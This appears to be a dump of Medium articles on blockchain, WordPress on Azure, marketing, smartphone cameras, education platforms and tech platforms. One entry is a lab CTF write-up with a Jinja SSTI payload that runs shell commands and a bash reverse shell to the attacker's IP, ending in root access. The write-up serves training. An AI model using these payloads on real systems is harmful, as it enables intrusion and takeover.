Foods and goods are produced and distributed in a hugely complex network in which many actors such as producers, distributors, consumers, and transporters play significant roles. With traditional manual paperwork, different errors and discrepancies may occur between the institutions involved in the supply chain process.
Blockchain technology can improve the process of distributing goods by providing trade centers with advanced infrastructure for certifying and tracking goods. Smart contracts can also be implemented for automatic payments in the supply chain.
Blockchain Technology Can Solve the Election Disputes
Political elections have always ignited disputes among parties; specifically, we have witnessed losing parties refuse to concede the results and accuse the other party of rigging votes and stealing the election. How, then, would it be possible to provide a comprehensive solution for such occasions? The implementation of Blockchain technology in the process of collecting and counting votes can significantly protect democracy from the threats that endanger the sovereignty of freedom in the modern world.
Blockchain technology, by providing a secure and decentralized platform, will never allow prefabricated structures, nor any party which enjoys dominance in the system, to confiscate the election results as desired.
Conclusion
It has not been a long time since the advent of Blockchain technology, but in the space of barely a decade, this technology has been able to change the world as we used to perceive it, in an entirely different manner. Although Blockchain technology is the fundamental concept behind cryptocurrencies, its application is not limited to financial issues. We can nowadays trace the use cases of Blockchain technology in a wide range of areas such as higher education, smart identity confirmation, KYC protocols, and so on. It has been predicted that in the near future, all businesses and trade centers will be obliged to use some form of Blockchain technology just to keep themselves adjusted to the dramatic changes of the postmodern era. | https://medium.com/@counosplatform/how-blockchain-technology-can-change-our-lives-74ff81a18ce2 | [] | 2020-12-11 18:16:35.973000+00:00 | ['Smart Contracts', 'Blockchain', 'Blockchain Technology', 'Third Party', 'Election 2020']
152 | Installing WordPress on an Azure App Service | Click on the Create button to proceed to the next screen where you’ll enter all the details.
We’ll give it a suitable App name. This app name will also become our website URL, so choose wisely! Next, select the Azure Subscription you want this resource to be charged to. Immediately after that, we’ll select the Resource Group — this allows us to logically organise our resources.
From the Database Provider dropdown, we’ll select MySQL In App. There are a few other options in there — all of which are just different ways you can create the database for this WordPress site.
MySQL In App runs a local MySQL instance with your app and shares resources from the App Service plan. There is no extra cost for this database. You cannot access the database using external tools like Workbench or MySQL CLI. Apps using MySQL In App are not intended for production environments, and they will not scale beyond a single instance. Read more about the limitations in this official blog post.
Now, let’s select App Service plan/Location to choose either an existing App Service plan or create a new one. This decides how much you’ll be paying for the App Service itself. If you’re following along, you can select a free tier as well.
Finally, select Application Insights and enable it so you can configure an Application Insights resource or disable it if you don’t require Application Insights right now. Don’t worry, you can always connect your App Service with an Application Insights resource later should you change your mind.
After entering all the details, click on Create. This will spin up your resources and in a few moments, you would be able to access it in the Azure portal.
Fun fact: In the background, Azure pulls all the required WordPress files from this GitHub repository.
Now, head over to the App Service you just created and click on Browse to open the website in a different browser tab. Note the URL — it contains your App Service name.
The first thing you would see is the WordPress installation page. Let’s start by selecting the language and then click on Continue.
Then, on the installation page, enter your site information. Securely store the username and password, as those will be the admin’s credentials for the site. You can then log in using these credentials and create accounts for your team if required.
Click on the Install WordPress button to begin the famous 5-minute WordPress installation.
Click on the Log In button to head over to the login screen.
Enter your username and password and then click on Log In to head over to your WordPress dashboard. It should look something like the following screenshot. Hooray!
Accessing MySQL via phpMyAdmin
For those who have used MySQL in the past, you would be hoping to see the phpMyAdmin portal to manage your database. In this scenario, search for and select MySQL In App option from the left menu list and then select Manage from the screen that opens.
phpMyAdmin comes installed and Azure should automatically take care of the login for you and redirect you to the phpMyAdmin portal.
Have fun customizing your WordPress website. Feel free to leave a link of your website in the comments and I’d love to check it out.
That’s it. Thanks for reading! | https://medium.com/@clydedz/installing-wordpress-on-an-azure-app-service-77dc2cf696d8 | ["Clyde D'Souza"] | 2020-12-16 05:26:28.750000+00:00 | ['How To', 'Technology', 'Website Design', 'WordPress', 'Azure'] |
153 | What is Content Marketing? | How is content marketing different from traditional advertising?
What most people find difficult to understand about content marketing is how it differs from traditional advertising. After all, if “content is king,” what have companies been marketing with all these years?
Traditional advertising is interruptive and allows marketers to push out their message in front of their audience — regardless of whether or not they want to see it. Traditional advertising rushes at consumers in the form of newspaper ads, magazine ads, billboards, radio ads, television ads, and direct mailings.
On the other hand, content marketing is much more subtle. This marketing is entertaining and educational. It draws in customers through storytelling, articles, blog posts, newsletters, emails, quizzes, infographics, videos, and podcasts. Content marketing offers consumers value and thereby makes them appreciate your company’s existence. You’re not advertising directly to your customers. You’re offering them something in your marketing that helps them feel connected to your brand.
Content marketing also excels through avenues like a company or outside blog, social media sites, YouTube, and online articles. These formats have only become more available in the past two decades, and companies are taking advantage of them.
There are a few other ways that you may distinguish content marketing from traditional advertising:
Short-term v. Long-term
Traditional advertising operated on the idea that a customer would see the ad and be enticed to buy the product immediately. But…who actually does this? Conversely, content marketing doesn’t worry about selling a product each and every time they get in front of their customer. Companies who focus on this strategy know that the best way to their customers’ wallets is by providing valuable content.
Talking to v. Talking with
Traditional advertising talks to customers. There's no dialogue or relationship. It's just a litany of benefits of a product or service. Content marketing, especially on social media, allows customers to respond, engage, interact, and get involved. You can gauge interest in certain topics or ask for feedback on new ideas. It allows you to cater your marketing and campaigns to your audience instead of telling them what you want them to hear.
Showing v. Nurturing
A great example of traditional advertising is a car dealership commercial. Within seconds, you know all about the business and product that is being sold to you. The person on the screen is talking at you, telling you what you could have, and showing you the price tag for it.
Content marketing is the opposite. It’s a slower process, and it targets customers who have an interest in your industry. By producing content that they find useful or interesting, you create and nurture a relationship with them. You provide value and keep them coming back.
General v. Targeted
Traditional advertising is about getting your message in front of as many people as possible. Content marketing targets a specific group of individuals. Before putting out a content marketing campaign, businesses will research that specific audience and look at trends that do well among that group. The more they know about them, the greater chance they have of boosting engagement, getting new sales, developing customer loyalty, and more! | https://medium.com/digital-marketing-lab/what-is-content-marketing-1a910111d6c1 | ['Casey Botticello'] | 2020-12-19 00:01:54.477000+00:00 | ['Entrepreneurship', 'Technology', 'Social Media', 'Productivity', 'Writing'] |
154 | 200 universities just launched 560 free online courses. Here's the full list. | In the past three months alone, more than 200 universities have announced 560 such free online courses. I've compiled this list below and categorized the courses into the following subjects: Computer Science, Mathematics, Programming, Data Science, Humanities, Social Sciences, Education & Teaching, Health & Medicine, Business, Personal Development, Engineering, Art & Design, and finally Science.
If you have trouble figuring out how to signup for Coursera courses for free, don’t worry — I’ve written an article on how to do that, too.
Here’s the full list of new free online courses. Most of these are completely self-paced, so you can start taking them at your convenience.
COMPUTER SCIENCE
MATHEMATICS
PROGRAMMING
DATA SCIENCE
HUMANITIES
SOCIAL SCIENCES
EDUCATION & TEACHING
HEALTH & MEDICINE
ENGINEERING
ART & DESIGN
BUSINESS
PERSONAL DEVELOPMENT
SCIENCE | https://medium.com/free-code-camp/200-universities-just-launched-560-free-online-courses-heres-the-full-list-d9dd13600b04 | ['Dhawal Shah'] | 2019-03-20 02:07:28.152000+00:00 | ['Programming', 'Startup', 'Self Improvement', 'Technology', 'Education'] |
155 | Multiple Cameras in a Smartphone. Do you really need them? | Nowadays, almost every smartphone comes with at least three cameras baked right into it. It includes two rear cameras and one front-facing camera. The mid-range segment smartphone camera system may comprise up to 5 cameras (including front-facing camera). But, do these numbers really matter? What’s the purpose of numerous cameras? And, where it all started?
The Beginning
In 2011, the LG Optimus 3D and HTC Evo 3D featured 5-megapixel dual rear cameras which were meant to make your photos look real by adding depth to them. At that time, new 3D technologies were becoming popular in the world of cinema, so smartphone manufacturers rolled the dice on a camera system that promised a 3D experience. The gamble turned out to be a foundational step for the smartphone industry: multi-camera systems are now heavily adopted by everyone.
A typical smartphone nowadays may consist of a main/primary camera, a depth-sensing camera, a wide-angle camera, a macro-camera and probably a telephoto lens or a time of flight sensor depending on the budget of your smartphone. Okay, so what do they do?
Primary Camera
The primary camera of your smartphone is the default camera which is used more often than any other camera. It has the highest resolution, more megapixel count and probably image stabilization baked into it.
The primary camera consists of a lens with fixed focal length and an image sensor which you can say is the heart of the camera. The bigger the image sensor, the higher the image quality. High megapixel count doesn’t always mean better image quality. It depends on the size of the sensor as well as the quality of the sensor. There are a lot of other factors which affect the image quality, which we will talk about in a minute.
The primary camera has a standard focal length ranging from 24mm to 28mm. Lenses with short focal lengths can capture a wider area, like a landscape. As the focal length increases, the field of view generally decreases.
One thing to note here is that the focal lengths mentioned here are not actual focal lengths of a smartphone camera lens.
In the world of smartphone photography, whenever you see a focal length of let’s say 26mm, that would be the focal length of a professional camera lens if it were to produce an image equivalent to the image captured by the smartphone from a particular angle.
Source: Realme
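The equivalence described above can be computed with a crop factor: divide the full-frame sensor diagonal (about 43.27 mm) by the phone sensor's diagonal, then multiply by the lens's actual focal length. A small sketch (the sample numbers are illustrative assumptions, not taken from any particular phone):

```python
FULL_FRAME_DIAGONAL_MM = 43.27  # diagonal of a 36x24 mm full-frame sensor

def crop_factor(sensor_diagonal_mm):
    """How much smaller the sensor is than full frame."""
    return FULL_FRAME_DIAGONAL_MM / sensor_diagonal_mm

def equivalent_focal_length(actual_focal_mm, sensor_diagonal_mm):
    """35mm-equivalent focal length for a lens on a smaller sensor."""
    return actual_focal_mm * crop_factor(sensor_diagonal_mm)

# Illustrative: a ~4.25 mm lens on a sensor with a ~7.06 mm diagonal
# behaves like a ~26 mm lens on a full-frame camera.
print(round(equivalent_focal_length(4.25, 7.06)))  # -> 26
```

This is why a spec sheet can quote "26mm" for a lens whose physical focal length is only a few millimetres.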
Depth-sensing Camera
As the name suggests, a depth sensor usually gathers information about the foreground and background of an image and uses that information to blur the background from the foreground of an image.
Why are they not used more often nowadays? Well, because most of the job is done by ‘software’ itself.
Wide-Angle Camera
The focal length of a wide-angle lens in a wide-angle camera is around 22–25mm, which is less than that of the primary lens. A short focal length means a large field of view.
The purpose of this camera is to usually take landscape photographs or in smartphone terminology, wide angle photographs.
Normally they perform well but the overall image quality is slightly less than the primary camera.
Telephoto Camera
A telephoto camera has a different type of lens whose focal length is relatively long, which leads to a narrower field of view. In practice, this means that if you have an object far, far away, you can capture its details by using a telephoto lens.
In simple terms, it is used for zooming in an object without the help of digital zoom.
Nowadays, smartphone manufacturers use something known as ‘hybrid zoom’ which combines the image from a telephoto lens and further applies a digital zoom to zoom into an object even farther.
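A simplified way to model this: the telephoto module's focal length relative to the main camera gives the optical zoom, and the digital crop multiplies on top of it. A sketch (the 26 mm and 52 mm figures are illustrative assumptions):

```python
def optical_zoom(main_focal_mm, tele_focal_mm):
    """Optical magnification of the telephoto module relative to the main camera."""
    return tele_focal_mm / main_focal_mm

def hybrid_zoom(main_focal_mm, tele_focal_mm, digital_factor):
    """Simplified model: total hybrid zoom = optical zoom x digital crop factor."""
    return optical_zoom(main_focal_mm, tele_focal_mm) * digital_factor

# e.g. a 52 mm-equivalent telephoto next to a 26 mm-equivalent main camera
# gives 2x optical zoom; cropping 5x digitally on top yields "10x hybrid zoom".
print(hybrid_zoom(26, 52, 5))  # -> 10.0
```

Real implementations also fuse image data from both modules, so this multiplication is only the headline number, not the whole pipeline.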
Macro Camera
A macro camera is generally used to capture tiny objects and minute details. The megapixel count of macro cameras in smartphones is usually low.
LiDAR Camera
You might have heard of a LiDAR sensor in the latest iPhone model but what’s the use of such a type of sensor? Well, the reason is quite interesting.
LiDAR (Light Detection and Ranging) is a technique in which the camera will fire pulses of infrared light on an object and will measure the time taken by the light to reflect from the object back to the camera sensor. In doing so, the distance of the object from the camera sensor can be calculated.
Also, by firing pulses of infrared light on multiple objects in a scene, the relative distance between those objects can be calculated which can be further used to know the depth information of those objects.
By doing so, you can blur the objects in the background from the objects in the foreground much more precisely and accurately rather than just guessing and approximating the whole thing.
LiDAR sensors can also be used for improving Augmented Reality in smartphones.
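The distance calculation behind time-of-flight is simple: the pulse travels to the object and back, so the one-way distance is the speed of light times the round-trip time, divided by two. A sketch:

```python
SPEED_OF_LIGHT_M_S = 299_792_458

def distance_from_time_of_flight(round_trip_seconds):
    """Distance to the object; the light covers the path twice (out and back)."""
    return SPEED_OF_LIGHT_M_S * round_trip_seconds / 2

# A pulse that returns after ~6.67 nanoseconds bounced off something ~1 m away.
print(distance_from_time_of_flight(6.67e-9))  # ~1.0
```

The tiny time scales involved (nanoseconds per metre) are why dedicated sensor hardware, rather than general-purpose code, does this measurement in practice.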
The availability of extra space in a smartphone is a big concern. You can’t have a lens which can change its focal length as per your requirement just like a DSLR camera. That’s why multiple lenses of different focal lengths are used to allow people to take shots from different angles.
We are in the era of smartphone photography. Nearly everyone has a smartphone and the ability to take decent photos from a smartphone itself without tweaking settings like focal length, aperture, ISO, shutter speed etc. is a huge deal for many people.
Do You Really Need Them?
Smartphone Photography
It depends. If you don't have a DSLR and you want to explore photography in general then multiple cameras can be good for you because it will allow you to explore different angles and perspectives. Or, if you are the kind of person who just wants to take decent photos and selfies, then a decent single or at the most a dual camera system would be more than sufficient for you. As far as image quality is concerned, it depends on the camera sensor and the software of the smartphone manufacturer. More megapixels don't mean better image quality.
A 12 Megapixel DSLR can produce better image quality than a 20 Megapixel smartphone camera because of the size of the camera sensor. The larger the surface area, the greater the amount of light captured by the sensor.
Google, in their Pixel smartphone used some advanced computational photography techniques to deliver some of the best photographs which could be ever taken from a single 12 MP smartphone camera.
So, it’s not a hard and fast rule to have multiple cameras in a smartphone. The advancement of smartphone photography may depend on Moore’s Law. Wait, what’s Moore’s Law? Well, let’s keep that for another blog post.
That’s all for now. Signing off.
If you have any suggestions, then you can send us a message by going to Contact tab or leave us a comment below.. | https://medium.com/@techthatthrills/multiple-cameras-in-a-smartphone-do-you-really-need-them-200bc420345a | [] | 2020-12-15 17:05:07.112000+00:00 | ['Cameras', 'Smartphones', 'Mobile Photography', 'Augmented Reality', 'Technology'] |
156 | 10 Must-Have Features of an Online Education Platform | Kitaboo | An online education platform is meant for delivery of educational content to students. The platform, unlike a textbook is an interactive medium where students can engage with the content. And therefore, these platforms are in high demand in schools and universities across the globe. Because every institute wants their students to understand the concepts and its implications in the real world. KITABOO Nov 15, 2019·3 min read
This high demand has resulted in the production and availability of many such online education platforms in the market, putting educational institutions in a dilemma. How do they decide which platform works best for their students? Every vendor claims to have the best learning platform which benefits students and teachers. They all have multiple features that are more or less similar to one another.
What then, is the differentiating factor which you should look for while selecting an online learning platform?
Here in this blog, we will highlight some of the features that must be present in a learning platform. Having a concise list will help you determine and compare among multiple tools and make the right choice for your students.
Also read: How Can eTextbooks Help K-12 Publishers, Institutes & Students
So, here are the must-have features of an online education platform.
1. Easy-to-use interface
First of all, we need an interface that is easy to use. The icons and text should be clear and legible. Teachers and students must be able to navigate through the app smoothly. A lot of teachers are still getting used to the idea of using eBooks and online content delivery platforms in classrooms.
As instructors are required to design courseware, they must be comfortable in using the platform efficiently. The tool should be designed in such a way that someone who does not know coding must be able to use and operate it without difficulty. As for students, they will appreciate a platform which allows them to navigate easily and functions smoothly.
2. Custom Branding
An institution would want a platform which offers a touch of personalization. Just like all the learning resources provided by an institute carry its logo, the learning platform must also incorporate its brand image/logo and color palette.
It will give the students a sense of belonging, rather than using a third-party tool. Therefore, you must look for a vendor who can provide a white-label platform, which you can customize as per your liking.
3. Offline Reading
Though it’s an online education platform, it must also be accessible offline. Students might want to download some content and read later. And in case there’s no internet connectivity, students should not be deprived of the chance to study. So, there must be an option for users to download content and read it offline.
4. Cloud-hosted Platform
Ensure that it is a cloud-based platform. Meaning, all the data is saved on the cloud. With a cloud-based tool, you can be assured that your content is always accessible from anywhere and anytime. Moreover, it can be updated as and when required, and the changes would be reflected in all students’ eBooks.
5. Interactive Elements
You should be able to add interactive elements to the platform. Online interactivities include quizzes, audio files, videos, simulations, gamification etc. The tool must also allow students to make notes and share with their peers or teachers, bookmark pages, search for information, highlight texts, etc. Including interactive elements increases student engagement with the courseware. Hence, look for all the interactivities that the platform offers.
Click here to know more about features an online education platform must have | https://medium.com/@kitaboo/10-must-have-features-of-an-online-education-platform-kitaboo-8f6accd12718 | [] | 2019-11-15 12:50:15.806000+00:00 | ['Education', 'Online Learning', 'Education Reform', 'Digital Learning', 'Education Technology'] |
157 | Secrets To Make Technology Serve You | “It’s hard to say exactly what it is about face-to-face contact that makes deals happen, but whatever it is, it hasn’t yet been duplicated by technology.” –Paul Graham “Blow up your TV, throw away your paper…” –John Prine
This strategy and action section offers some ideas to help curate, filter, and synthesize technology. Feel free to use these ideas, discard them, or put your own spin on them.
Television Mastery
The idea to master our use of television starts with placing a buffer between us and the content from our television. Cable TV is largely a gateway to reruns, commercials, or news. By eliminating cable, we effectively set up a buffer between our minds and advertising-based content. Now we can take control of the technology and add an application to our television to synthesize what we take in. An example might be to connect our television to the Internet, or link it up to Netflix, Amazon Video, or a Google Chromecast. Now, we have a barrier where we’re forced to make a conscious decision about selecting what to watch instead of just turning on the television and consuming.
Computer Mastery
Rescue Time: This app lets us turn the Internet on our computers on and off for a predetermined length of time. I like to use Rescue Time to turn off the Internet on days like today, when I’m writing and don’t want the temptation to start looking things up online that can interfere with my work. Rescue Time helps filter out the noise which would degrade our willpower first thing in the morning. When we control the Internet on our devices, we make conscious choices about how we’ll use it.
The Game Changer
The most valuable ways I’ve found to control and drive my use of a Smartphone and laptop are as follows:
At night, before bed, I create a to-do list for the next day on a 4x6 note card.
From that list, I will select or write in the three most important things to do. The idea is that if I get nothing else done, and only complete these three things, I would still make progress towards a goal or outcome I want to create.
The next day, before I do anything online, before I even TOUCH my Smartphone, I do those three things. No outside stimulus until they’re done.
This is a simple way to get where we want to go, without derailing ourselves or chipping away at our willpower first thing in the morning. This is an act of defiance towards always being connected; it’s a way to refuse to be a servant of technology.
Content Curation and Filtering Online
Feedly: This app brings all the feeds from your favorite websites into one place where you can read or share select articles and content. Simply login and add the specific sites you want to get news and updates from. The app doesn’t bring in advertisements, so you’re able to read things without constantly seeing display advertising. If you’re learning something, or trying to break into a new industry, simply add those websites of curated content from influencers into your Feedly. Over time, you can use Feedly to build a custom stream of highly relevant, amazingly useful content which will save you hours of time.
Upside Exposure: The best and most scalable way to increase our exposure to opportunities is to set up online social media accounts on Twitter and LinkedIn. Depending on your industry, using Medium might be helpful, but we don’t need to worry about that for now. These accounts allow us to capitalize and create opportunities where we are using technology instead of it using us. If you don’t have a personal website at this point, don’t worry. LinkedIn can hold your resume and be the hub of your online presence, while Twitter is a more specific opportunity generator.
An opportunity generator is something we set up which can advertise and promote ourselves while we’re not directly working. In business, we might call the creation of these opportunities “lead generation.” In our personal lives, many people just call this smart. Many people have grandparents who told them to never look for a job, but always look for an opportunity. Having social profiles set up to work on our behalf to uncover and expose us to opportunities would make our grandparents proud.
Platforms as Opportunity Generators
By investing small amounts of time into building or improving opportunity generators, we can reap huge rewards. These rewards may include: new friends, business connections, job offers, expertise requests, help with starting a business, and much more. The idea is to interact with others, send cold emails, write articles in our industry, and link them back to the platforms containing our resume, proof of skills, or even work that shows proof of our imagination.
Twitter: You don’t have to tweet, but by having this set up, you’ll be able to claim your name and prepare for when/if you do tweet. Just sign up and post a single tweet. This helps in case anyone on Twitter searches for your name, and this single tweet can direct interested parties to the appropriate place.
“Thanks for stopping by! Too busy to tweet at the moment, but let’s connect (link to your email address or your LinkedIn profile).”
The link to connect can go to the places we mentioned above, or to your profile at your current company, your personal website, or even a short 30- to 60-second video introducing yourself, your skills, and, if you’re a job-seeker, what you’re looking for.
LinkedIn Profile: If you’re looking for a job, opportunity, or promotion, this is the place to start. Recruiters scour LinkedIn all day long looking for applicants. There are a million free resources online showing how to optimize your LinkedIn profile, so I won’t bore you with details here.
The idea is to set up a LinkedIn profile and, over time, add more than 500 connections. The LinkedIn publishing platform is still in its infancy, and it’s a great time to use it to begin writing industry-specific articles. The publishing platform will likely grow even larger and more esteemed as time goes on. Getting involved now and having a public place such as your LinkedIn profile to write and become noted in your industry is a great way to generate opportunities and serendipitous connections.
If you need a job, make sure your LinkedIn profile is cleaned up and your resume is posted. Then, on LinkedIn’s publishing platform, write a post titled something along the lines of “Ten Things I Didn’t List on My Resume.” Include everything, such as stories or decisions which have built your character.
You can follow up that post with “10 Reasons I’m Ready to Work at (company name here),” citing what you bring to the table. Or something like “10 Ways For (company name here) to Increase Their Sales.” The idea is to stand out from the traditional channels of resume spamming and find opportunities before they’re advertised to the market.
LinkedIn’s long-term goal is to turn up contextual economic opportunities for the right people, at the right time. If you’re not 100% sure what this means, look it up and write a post about why the long-term vision of LinkedIn is important. If you get it right, LinkedIn will likely want to promote your writing. If you’re a horrible writer, record what you want to say and have it transcribed, or hire an editor on Upwork to proofread your work. LinkedIn is a platform which can unlock thousands of opportunities.
Personal Website: This isn’t needed at first, but for specific creative types (artists, designers, or engineers), this might make sense. The credentials of the future involve being able to cite proof of skills at a moment’s notice to show a potential employer, friend, or business partner. Creating a personal website by using an incredibly cheap and full-service solution provider like Squarespace is perfectly suited to showcase our proof of skills.
Launching a personal website is also a great excuse to grab the domain name for your name. Most .com domains will be taken, but there is a good chance you might be able to find a .co or suitable alternative such as (www.YourFirstName-YourLastName.com). If you want to blog or start a business and sell products or services from a personal site, Squarespace lets you sell digital products and services using the awe-inspiring payment processor, Stripe.
A Few Notes on Platforms
Ensure congruence across platforms. Make sure that all your social media profiles display the message you want to convey. For the advanced folks, or those who already have LinkedIn and Twitter accounts set up and are using them well, you can consider other opportunity generators such as Medium or AngelList.
AngelList will be incredibly useful as we dive into reverse engineering entry into high-growth technology fields in the next article, so if you’re interested in this, consider setting up a profile there.
Medium: This is where you can write about certain industry or life-specific topics and give those writings exposure to a large audience. This is an alternative or supplement to publishing on LinkedIn, and might be a bit more useful to those interested in startups, technology, design, art, or writing.
AngelList: This is where you can learn all about startups and technology businesses and discover how to land jobs with them. If you’re a qualified angel investor, you can start looking for companies, funds, or syndicates for investment. Anyone interested in technology should become familiar with this site. AngelList is the best platform on the Internet to connect early-stage businesses with funding and employees. They’re also building index funds for investing and are beginning to raise large amounts of money to invest in startups. You can always find where the future of industries are heading by studying where investment dollars are going on AngelList.
All of these platforms we have mentioned can become opportunity generators if used appropriately. Once you’re set up, at least on LinkedIn and Twitter, you’ve embraced the mindset of exposing yourself to good things. Now, when you start seeking out opportunities, you have an online presence to capture opportunities and introductions as you go. | https://medium.com/the-mission/secrets-to-make-technology-serve-you-f2300e6c7a67 | ['Chad Grills'] | 2018-07-05 17:27:59.364000+00:00 | ['Media', 'Life', 'Culture', 'Technology', 'Marketing'] |
158 | CTF [Dec 11–15]: Pwn a buggy webapp in 5 minutes | In this post, I will be talking about an intentional bypass that allows you to get root and solve the whole WebApp Security CTF in under 5 mins!
Try the challenge yourself: https://attackdefense.com/challengedetails?cid=2160
Note: If you want a organized solution where all the flags are retrieved in the order, then take a look at the manual.
Scenario:
We get a Code IDE webapp that shows a login page:
Code IDE webapp
Hacking our way in!
Enter any random credentials and try to login:
Login attempt using some random credentials
Note: Use Burp proxy to intercept all the requests.
Notice that the request goes to port 8000 of the target machine!
Let’s try and access the API in the browser:
Uh no! Page Not Found :/
Try to access some random page:
Oh nice! Page name gets reflected
Awesome, so the page name gets reflected in the response.
Check the response of the above request in the HTTP History tab in Burp:
Response indicates of Python (Werkzeug) backend
The backend is Python-based (Werkzeug WSGI utility is used)!
Try to see if the page is vulnerable to SSTI (Server-Side Template Injection):
URL: 192.248.251.3:8000/{{7*'7'}}
Awesome! The backend is vulnerable to SSTI
The response makes me really happy! The backend is vulnerable to SSTI and it is probably using Jinja template at the backend!
Try running shell commands now:
SSTI Payload: {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
Fantastic! We can execute shell commands as well
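Why does that attribute chain hand us the os module? In a Flask/Jinja2 setup like this, config is an ordinary Python object, its class's __init__ is a plain function, and a function's __globals__ dictionary is the namespace of its defining module, which happens to import os. A stdlib-only illustration with a stand-in Config class (an assumption standing in for Flask's real config object):

```python
import os

# Stand-in for Flask's config object; defined in a module that imports os,
# just like flask.config does.
class Config:
    def __init__(self):
        self.debug = False

cfg = Config()

# Walk the same attribute chain the SSTI payload uses:
# instance -> class -> __init__ function -> that function's module globals.
recovered_os = cfg.__class__.__init__.__globals__["os"]

print(recovered_os is os)  # True: we reached the os module
print(recovered_os.popen("echo pwned").read())  # arbitrary command execution
```

The template engine never exposes os directly; the attacker only needs some object reachable from the template context and this kind of attribute traversal.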
Next step would be to get a shell session!
Getting the IP address of the attacker machine:
Checking the IP address of the attacker machine
Start a netcat listener on the attacker machine to receive back the shell session:
Started a netcat listener on port 4444 on the attacker machine
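If netcat ever isn't available on the attacker machine, the listener side can be sketched with Python's stdlib socket module (a rough stand-in for nc -lvp 4444, not a full replacement since it doesn't relay your keyboard input by itself):

```python
import socket

def make_listener(host="0.0.0.0", port=4444):
    """Open a listening TCP socket, like `nc -lvp 4444`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv

def wait_for_connection(srv):
    """Block until the reverse shell (or any client) connects back."""
    conn, addr = srv.accept()
    print(f"connection from {addr[0]}:{addr[1]}")
    return conn
```

After wait_for_connection returns, you would write commands to and read output from conn; netcat wires that up to your terminal automatically.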
Send the following SSTI payload to the backend API:
SSTI Payload: {{config.__class__.__init__.__globals__['os'].popen("bash -c 'bash -i >& /dev/tcp/192.248.251.2/4444 0>&1'").read()}}
Notice the terminal where the netcat listener was started:
Wow! Is that a root shell :D
Yes we are root!
Now it's just simple from here… Just use the grep and find commands and pull out the flags :D
The database credentials can be found in the backend API code and that would let you get the root credentials.
Also, there was one more flaw - | https://blog.pentesteracademy.com/webapp-security-ctf-dec-11-15-pwning-under-5-mins-df26d61fc36c | ['Shivam Bathla'] | 2020-12-17 15:03:43.400000+00:00 | ['Ctf', 'Security', 'Information Technology', 'Cybersecurity', 'Hacking'] |
159 | The Platform Matrix: Not All Platforms Are Created Equal | The Platform Matrix: Not All Platforms Are Created Equal
Image credit: Shutterstock
I have previously explained how network effects shape three broad types of tech businesses — marketplaces, interaction networks and data networks. In addition to these, there is one other type of business where network effects play a central role — platforms. Unfortunately, the tech and startup world has spent much of the past decade using the term “platform” to describe everything from operating systems to analytics tools, algorithms, APIs, etc. Quite plainly, if everything is a platform, then nothing is and the term loses all meaning. So let’s take a more granular look at what platforms really are, and then unpack how their network effects work.
What is a platform?
The most meaningful definition of a platform comes from none other than Bill Gates, the architect of one of the first true platform businesses.
“A platform is when the economic value of everybody that uses it, exceeds the value of the company that creates it” — Bill Gates (as relayed by Chamath Palihapitiya)
Focusing on economic value to external participants automatically eliminates the vast majority of companies that call themselves platforms. For example, Tableau is a data visualization and analytics tool, but not a platform. However, Xbox, iOS, Android, Salesforce, Shopify, and even Roku are all platforms because they help third-party developers generate economic value on top of their businesses. In order to unlock this economic value, aspiring platforms need to have the following components:
1. Underlying product: Platforms are always built on top of an existing product with some standalone value. For example, iOS and Android were smartphone operating systems that had self-contained features (phone, text, web browser, etc.) even before developer activity took off.
2. Development framework: One of the most basic requirements for any platform is that it must allow third-party developers to leverage the platform's capabilities to create software products for platform users.
3. Matching: Modern platforms create an avenue for developers to distribute apps and help platform users discover apps that meet their needs. Enabling discovery is especially important because platforms own the primary relationship with customers or users.
4. Economic benefit: Finally, platforms provide economic benefits to developers and help them build, monetize, or enhance their businesses on top of the platform. These benefits can be either direct (earning revenue from the platform) or indirect (improving engagement or retention via the platform).
In summary, platforms combine an underlying product and the development capabilities of software frameworks with the matching and monetization functions of marketplaces.
Platform = Underlying Product + Development Capabilities + Marketplace
As a result, platforms have some similarities with marketplaces. For example, customer and developer fragmentation is critical for them to be viable. Also, platforms have cross-side network effects, i.e. the addition of each developer makes the platform more valuable for all users and vice versa. This feedback loop makes them more valuable as user and developer adoption grows.
Now that we understand the basics of platforms, let’s take a deeper look at how platform network effects work.
Scalability: Platform Focus
I previously evaluated the scalability of marketplaces based on the geographic range of their network effects, i.e. the maximum physical distance between demand and supply for interactions to take place. Marketplaces with cross-border network effects are significantly more scalable than hyperlocal ones because they can leverage a supplier in one region to attract demand in another. However, we cannot use this approach to compare the relative scalability of platforms because they are purely digital businesses, i.e. their network effects are almost always cross-border. The addition of a developer in one region makes the platform more valuable for users all over the world, and vice versa.
If platforms are cross-border by nature, their scaling potential should depend on their ability to organically expand into adjacent vertical markets or categories (not regions). In other words, scalability depends on the breadth of the platform’s standalone capabilities.
Take Xbox as an example — the underlying capabilities of the platform (processing power, graphics, controller) were designed for gaming. This focus and a growing base of game developers led to strong customer adoption, primarily from gamers. With the launch of the Xbox One, Microsoft attempted to expand this gaming platform to a larger market — home entertainment. However, media was a small minority of the platform’s value for its customer base. In addition, the Xbox One could not justify its price premium over competing streaming devices to non-gamers, as its unique capabilities and developer base did not appeal to that market. As a result, Xbox could not expand its market or gain share against other dedicated streaming devices.
Game consoles and entertainment platforms like Roku are the clearest examples of focused platforms, but they are not the only ones. In recent years, there have been a number of specialized SaaS tools that have launched their own developer programs and app stores. This includes Slack, Zoom, Okta, and Zendesk. They still meet the definition of platforms, but their developer programs are largely restricted to the specific use case of the underlying product.
This means that the most scalable platforms are those that are multi-purpose, with capabilities that can enable a wide array of potential use cases.
Both iOS and Android (combined with Google Play) are great examples here. As smartphone operating systems, they have always enabled a wide variety of functions. For example, the first iPhone and the T-Mobile G1 (the first Android smartphone) both launched with roughly 15 pre-loaded apps, including YouTube and maps. As a result, they attracted customers who used them as multi-purpose platforms. This initial customer base, combined with a rapidly expanding collection of APIs then helped them attract developers across a range of different categories, from gaming to social media, e-commerce, health, finance, and so on. In other words, they leveraged their capabilities to enter adjacent categories and evolve from mobile computing platforms to general-purpose computing platforms.
Multi-purpose platforms are not limited to computing. SaaS tools like Salesforce and Shopify have become essential infrastructure for their customers’ operations and effectively act as operating systems for business. This allows them to create scalable, multi-purpose developer platforms as well.
Defensibility: Role of Developers
